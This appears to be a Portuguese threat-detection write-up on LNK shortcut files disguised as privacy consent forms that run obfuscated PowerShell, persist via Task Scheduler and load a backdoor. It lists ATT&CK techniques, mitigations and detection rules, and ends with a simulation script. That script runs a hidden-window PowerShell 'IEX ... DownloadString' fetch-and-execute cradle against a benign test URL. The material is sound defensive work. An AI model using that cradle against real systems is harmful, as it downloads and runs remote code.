O Que Realmente Estava Dentro do Arquivo de Atalho Disfarçado como um Formulário de Consentimento de Privacidade?
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Atores de ameaças estão distribuindo arquivos LNK maliciosos disfarçados como formulários de consentimento de privacidade para enganar os usuários a abri-los. Quando executados, esses arquivos de atalho lançam comandos PowerShell ofuscados que recuperam e executam cargas adicionais usando técnicas sem arquivo. A cadeia de ataque é projetada para roubar informações e implantar um carregador de backdoor que ajuda a preservar o acesso e a persistência.
Investigação
A investigação mostrou que os arquivos LNK embutem código PowerShell ofuscado responsável por baixar scripts posteriores. Esses scripts secundários incluem um downloader que obtém cargas úteis de serviços web legítimos e um carregador que os executa diretamente na memória. O autor da ameaça também abusa do Agendador de Tarefas do Windows para persistência e usa documentos de isca para fazer parecer que a atividade maliciosa é legítima.
Mitigação
As organizações devem impor verificação rigorosa de extensões de arquivos e alertar os usuários sobre arquivos LNK disfarçados como documentos comuns. As equipes de segurança devem monitorar de perto a atividade do Agendador de Tarefas, logs de execução do PowerShell e conexões de rede de saída. Os usuários também devem ser treinados para validar tanto o remetente quanto o caminho de entrega de qualquer arquivo recebido antes de abri-lo.
Resposta
Se essa atividade for detectada, os administradores devem revisar imediatamente entradas suspeitas do Agendador de Tarefas e a criação incomum de scripts PowerShell em diretórios acessíveis por usuários. Os logs do PowerShell devem ser analisados e as conexões externas devem ser rastreadas, especialmente aquelas envolvendo plataformas de nuvem legítimas ou serviços de armazenamento web. Uma investigação forense completa deve ser realizada em quaisquer scripts maliciosos identificados e tráfego de rede não autorizado.
graph TB %% Definição das classes classDef initial_access fill:#f96,stroke:#333,stroke-width:2px classDef execution fill:#69f,stroke:#333,stroke-width:2px classDef persistence fill:#6c6,stroke:#333,stroke-width:2px classDef discovery fill:#ff9,stroke:#333,stroke-width:2px classDef exfiltration fill:#f66,stroke:#333,stroke-width:2px %% Etapa de acesso inicial action_user_exec[“<b>Ação</b> – <b>T1204.002 User Execution: Malicious File</b><br/>A vítima executa um arquivo de atalho .LNK enganoso<br/>disfarçado como um formulário de consentimento.”] class action_user_exec initial_access action_masquerade[“<b>Ação</b> – <b>T1036.008 Masquerading: Masquerade File Type</b><br/>O arquivo .LNK imita um formulário legítimo<br/>de consentimento de informações pessoais.”] class action_masquerade initial_access %% Etapa de execução action_obfuscation[“<b>Ação</b> – <b>T1027.009 Obfuscated Files or Information: Embedded Payloads</b><br/>O arquivo .LNK contém uma carga útil<br/>de script PowerShell ofuscada.”] class action_obfuscation execution action_cloud_api[“<b>Ação</b> – <b>T1059.009 Command and Scripting Interpreter: Cloud API</b><br/>O script PowerShell utiliza serviços em nuvem<br/>para baixar scripts maliciosos adicionais.”] class action_cloud_api execution action_proxy_exec[“<b>Ação</b> – <b>T1216 System Script Proxy Execution</b><br/>O malware utiliza execução por proxy<br/>de scripts do sistema para manter baixa visibilidade.”] class action_proxy_exec execution action_reflective_load[“<b>Ação</b> – <b>T1620 Reflective Code Loading</b><br/>Os scripts baixados são executados na memória<br/>usando métodos sem arquivos.”] class action_reflective_load execution %% Etapa de persistência action_scheduled_task[“<b>Ação</b> – <b>T1053 Scheduled Task/Job</b><br/>Uma tarefa é registrada no Agendador de Tarefas do Windows<br/>para garantir a execução após a reinicialização.”] class action_scheduled_task persistence %% Etapa de descoberta action_sys_info[“<b>Ação</b> – <b>T1082 System Information Discovery</b><br/>O script PowerShell coleta detalhes do sistema operacional,<br/>configurações de rede e endereços IP.”] class action_sys_info discovery action_query_reg[“<b>Ação</b> – <b>T1012 Query Registry</b><br/>O script consulta o registro para identificar<br/>processos em execução e produtos de segurança.”] class action_query_reg discovery %% Etapa de objetivo action_backdoor[“<b>Ação</b> – <b>Backdoor loader-type</b><br/>Mantém o acesso e permite a execução<br/>de atividades maliciosas adicionais.”] class action_backdoor exfiltration action_selective_exclusion[“<b>Ação</b> – <b>T1679 Selective Exclusion</b><br/>O backdoor permite exclusões seletivas<br/>para contornar controles de segurança.”] class action_selective_exclusion exfiltration %% Fluxo de conexões action_user_exec –>|leva_a| action_masquerade action_masquerade –>|aciona| action_obfuscation action_obfuscation –>|contém| action_cloud_api action_cloud_api –>|implanta| action_proxy_exec action_proxy_exec –>|executa| action_reflective_load action_reflective_load –>|estabelece| action_scheduled_task action_scheduled_task –>|executa| action_sys_info action_sys_info –>|leva_a| action_query_reg action_query_reg –>|informa| action_backdoor action_backdoor –>|habilita| action_selective_exclusion
Fluxo de Ataque
Detecções
Possível Descoberta de Informações do Sistema Usando Módulo Wmi PowerShell (via PowerShell)
Ver
Possíveis Indicadores de Ofuscação de PowerShell (via PowerShell)
Ver
Execução de Arquivo LNK Malicioso Levando a Download Externo e Conexões [Conexão de Rede do Windows]
Ver
Execução e Persistência de Arquivo LNK Malicioso via Agendador de Tarefas [Criação de Processo do Windows]
Ver
Arquivo LNK Malicioso Executando PowerShell Ofuscado [PowerShell do Windows]
Ver
Execução de Simulação
Pré-requisito: O Cheque Pré-Voo de Telemetria e Base deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos errados.
-
Narrativa do Ataque & Comandos: O adversário busca estabelecer acesso inicial e baixar uma carga de malware de segunda fase. Para evitar a detecção por scanners de arquivos simples, usam um arquivo LNK (Atalho). Este arquivo LNK é projetado para executar
powershell.exeem uma janela oculta. O comando passado para o PowerShell usaInvoke-ExpressionandDownloadStringpara puxar um script de uma URL remota. Isso imita ataques reais de “Living-off-the-Land” (LotL) onde binários legítimos são usados para executar ações maliciosas, visando burlar antivírus baseados em assinaturas tradicionais. -
Script de Teste de Regressão:
# 1. Defina a URL de destino (usando um site benigno para teste) $url = "https://www.google.com" # 2. Crie a string de carga útil maliciosa de PowerShell # Esta string é projetada para acionar a detecção de 'DownloadString' e 'Invoke-Expression' $payload = "IEX (New-Object Net.WebClient).DownloadString('$url')" # 3. Crie um conteúdo de arquivo LNK fictício (Simulado) # Em um ataque real, este seria um arquivo .lnk binário. # Aqui executamos o comando diretamente para garantir que o log ScriptBlock seja gerado para validação. Write-Host "[+] Simulando execução maliciosa de PowerShell via carga útil LNK..." powershell.exe -WindowStyle Hidden -Command $payload Write-Host "[+] Comando de simulação executado. Verifique o Evento ID 4104." -
Comandos de Limpeza:
# Remova quaisquer artefatos se arquivos foram criados Remove-Item -Path "$HOMEDesktopSimulated_Malicious_LNK.lnk" -ErrorAction SilentlyContinue Write-Host "[+] Limpeza completa."